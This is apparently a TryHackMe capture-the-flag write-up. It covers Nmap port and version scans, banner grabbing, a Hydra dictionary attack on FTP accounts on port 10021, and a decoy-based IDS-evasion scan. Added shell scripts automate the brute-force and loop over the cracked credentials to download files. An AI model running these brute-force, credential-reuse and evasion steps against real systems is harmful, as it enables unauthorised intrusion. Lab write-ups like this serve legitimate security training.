This challenge requires the use of Nmap, telnet, and Hydra to enumerate a server and retrieve a flag from within its FTP service.
What is the highest port number open less than 10,000?
Answering this question requires us to enumerate the ports open on the target server. A simple Nmap scan will reveal the answer; to save some time initially, I restricted the scan to the first 10,000 ports (-p 1-10000).
Based on the output of that scan, port 8080 is the highest open port below 10,000.
There is an open port outside the common 1000 ports; it is above 10,000. What is it?
I need to run another scan, this time across all 65,535 ports (-p-). For the sake of brevity I added the -T4 option to speed it up. This would not be recommended on a real-world penetration test, because the faster probe rate is far more likely to trigger an IDS alert.
Based on the output of this scan, the port in question is 10021.
How many TCP ports are open?
The last scan we performed showed 6 total TCP ports open on the server.
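The three port questions above are all answered by reading the Nmap output, which is easy to do by eye for one host but worth scripting when there are several. The shell functions below are an added example, not part of the original write-up: they parse Nmap's grepable format (-oG -) and report the highest open port below a limit, the open ports above it, and the total open TCP count. The embedded scan output is constructed to match the format, with four open ports chosen for illustration; it is not the real output from the challenge host.

```shell
#!/bin/sh
# Constructed stand-in for `nmap -p- -oG - <target>` output (not the real scan).
SAMPLE_GNMAP='# Nmap 7.93 scan initiated as: nmap -p- -T4 -oG - 10.10.58.215
Host: 10.10.58.215 ()   Status: Up
Host: 10.10.58.215 ()   Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 8080/open/tcp//http-proxy///, 10021/open/tcp//ftp///   Ignored State: closed (65531)
# Nmap done -- 1 IP address (1 host up) scanned'

# Print every open TCP port from grepable output on stdin, one per line, ascending.
# Each port entry has the form PORT/STATE/PROTO//SERVICE///, comma separated,
# so filtered/closed entries never match /open/tcp/.
open_tcp_ports() {
  grep '^Host:.*Ports:' \
    | tr ',' '\n' \
    | sed -n 's#.*[[:space:]]\([0-9][0-9]*\)/open/tcp/.*#\1#p' \
    | sort -n
}

# Highest open TCP port strictly below $1 (prints 0 if there is none).
highest_open_below() {
  open_tcp_ports | awk -v lim="$1" '$1 < lim { best = $1 } END { print best + 0 }'
}

# Open TCP ports strictly above $1, one per line.
open_above() {
  open_tcp_ports | awk -v lim="$1" '$1 > lim'
}

# Total number of open TCP ports.
count_open_tcp() {
  open_tcp_ports | wc -l | tr -d ' '
}

# Usage against a live scan: nmap -p- -oG - TARGET | highest_open_below 10000
printf '%s\n' "$SAMPLE_GNMAP" | highest_open_below 10000
printf '%s\n' "$SAMPLE_GNMAP" | open_above 10000
printf '%s\n' "$SAMPLE_GNMAP" | count_open_tcp
```

Piping a live scan through these functions (`nmap -p- -oG - TARGET | count_open_tcp`) avoids re-reading the human-readable table, and the same parser works when the grepable file contains several hosts.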
What is the flag hidden in the HTTP server header?
To answer this question, we can use Telnet to connect to HTTP's default port, port 80, and read the flag from the response headers. I used the commands in the image below:
As you can see, the requested flag appears in the Server header of the response to a basic HTTP GET request.
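What the telnet session types by hand is a raw HTTP request: the request line, a Host header, and the empty line that ends the header block, each terminated by CRLF. The script below is an added example, not part of the original write-up: it builds that request, shows the scriptable equivalent of the telnet session (using nc, which is assumed to be installed and is not exercised by the test), and extracts the Server header from a response. The embedded response is constructed for illustration and its flag value is made up.

```shell
#!/bin/sh
# Constructed stand-in for the target's reply (not the real response or flag).
SAMPLE_RESPONSE='HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu) FLAG{constructed_sample}
Content-Type: text/html

<html><body>Server: this line is in the body, not a header</body></html>'

# The same bytes a telnet user types: request line, Host header, blank line.
# CRLF line endings and the terminating empty line are what make it a complete request.
http_request() {   # $1 = Host header value
  printf 'GET / HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' "$1"
}

# Scriptable equivalent of `telnet HOST 80` followed by the typed request.
# Requires nc (netcat); talks to the network, so it is not run by the test.
http_probe() {   # $1 = host, $2 = port (default 80)
  http_request "$1" | nc -w 5 "$1" "${2:-80}"
}

# Print the value of the Server header from a response read on stdin.
# Only lines before the first empty line (the header block) are considered,
# so a "Server:" string inside the body is ignored.
server_header() {
  tr -d '\r' | sed -n '1,/^$/s/^[Ss]erver:[[:space:]]*//p'
}

# Usage against the live target: http_probe 10.10.58.215 | server_header
printf '%s\n' "$SAMPLE_RESPONSE" | server_header
```

The SSH banner for the next question can be grabbed the same way (`nc TARGET 22`), because an SSH server sends its version string as soon as the connection opens, before the client has to say anything.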
What is the flag hidden in the SSH server header?
To answer this question, I need more information about the SSH service running on its default port, port 22. There are numerous ways to find this, but one method is an Nmap service and version detection scan with the -sV option. See the command syntax and its output below:
To find the flag, look closely at the SSH banner (the server's version string) mid-way through the output. This appears to be the correct flag for this question.
We have an FTP server listening on a nonstandard port. What is the version of the FTP server?
In an earlier question we discovered that the nonstandard FTP port is 10021, so we must pass that port to the -sV scan (-sV -p 10021) to get the information we are looking for.
In this picture we can see that the FTP server running on port 10021 is vsftpd 3.0.3. This is the answer we need.
We learned two usernames using social engineering: “eddie” and “quinn”. What is the flag hidden in one of these two account files and accessible via FTP?
Answering this question requires a bit of nuance in the Hydra command. Do not forget to give Hydra port 10021 as the FTP port: because the service is not on its standard port, the target must be written either with -s 10021 or as ftp://10.10.58.215:10021 rather than the usual bare hostname.
Because I didn't yet know whose account held the accessible file, I ran the dictionary attack against both usernames and retrieved their passwords, as shown below:
I logged in to both accounts with the commands in the following picture and found that the username quinn led to a file named ftp_flag.txt that was readable by everyone (read permission set for owner, group and others). I therefore used the FTP get command to copy the file from the remote machine to my local machine.
I then quit the FTP session and ran ls to find the newly downloaded file in my home directory. Finally I used cat to print the contents of the file and retrieve the flag.
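Running the attack against both users and then logging in to each one by hand is fine for two accounts, but it is a natural thing to automate. The script below is an added example, not part of the original write-up: it parses the result lines Hydra prints (`[PORT][ftp] host: ...   login: ...   password: ...`) into user:password pairs and then fetches the file from the nonstandard port with curl, which supports an explicit port in the ftp:// URL. The embedded Hydra output is constructed for illustration and the passwords in it are made up; the fetch function talks to the network and is not exercised by the test.

```shell
#!/bin/sh
# Constructed stand-in for Hydra's output (not the real run; passwords are invented).
SAMPLE_HYDRA='Hydra v9.1 (c) 2020 by van Hauser/THC
[DATA] attacking ftp://10.10.58.215:10021/
[10021][ftp] host: 10.10.58.215   login: eddie   password: example-eddie-pw
[10021][ftp] host: 10.10.58.215   login: quinn   password: example-quinn-pw
1 of 1 target successfully completed, 2 valid passwords found'

# Hydra invocation for two users against FTP on a nonstandard port
# (-L = user list, -P = password list, -s = port). Not run here.
run_hydra() {   # $1 = host, $2 = port, $3 = users file, $4 = wordlist
  hydra -L "$3" -P "$4" -s "$2" "$1" ftp
}

# Reduce Hydra's result lines to "user:password", one pair per line.
# Only lines of the form "[PORT][ftp] host: H   login: U   password: P" match.
hydra_creds() {
  sed -n 's/^\[[0-9]*\]\[ftp\] host: [^ ]*[[:space:]]*login: \([^ ]*\)[[:space:]]*password: \(.*\)$/\1:\2/p'
}

# Try to download $3 from ftp://$1:$2 with every user:password pair on stdin.
# curl takes the port directly in the URL, so no special FTP client setup is needed.
# Requires network access; not run by the test.
fetch_ftp_file() {   # $1 = host, $2 = port, $3 = remote filename
  while IFS=: read -r user pass; do
    if curl -s -u "$user:$pass" "ftp://$1:$2/$3" -o "$user.$3"; then
      echo "[$user] fetched $3 -> $user.$3"
    else
      echo "[$user] $3 not readable or not present"
    fi
  done
}

# Usage against the live target:
#   run_hydra 10.10.58.215 10021 users.txt /usr/share/wordlists/rockyou.txt \
#     | hydra_creds | fetch_ftp_file 10.10.58.215 10021 ftp_flag.txt
printf '%s\n' "$SAMPLE_HYDRA" | hydra_creds
```

Piping Hydra straight into the fetch loop means the account that actually holds a world-readable ftp_flag.txt is found without an interactive login per user.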
Browsing to http://10.10.58.215:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?
This challenge presents us with the task of running an Nmap scan that is covert enough to evade detection by the IDS. On an actual penetration test I would use the following command: nmap -sS -p- -T1 -D 10.10.209.194,10.10.209.105 10.10.58.215. This is a SYN ("stealth") scan (-sS) of all ports (-p-) at the slow "sneaky" timing (-T1), with two decoy source addresses (-D) mixed in alongside my real address, so it combines several methods of avoiding IDS detection.
However, when I ran this scan it was taking a very long time to complete. Of course this is because -T1 waits about 15 seconds between probes, so sweeping all 65,535 ports at that rate would take well over a week. For the sake of the exercise I therefore used the following, much faster scan, which achieved the necessary result and produced the flag.
And there we have it. Another TryHackMe CTF challenge complete!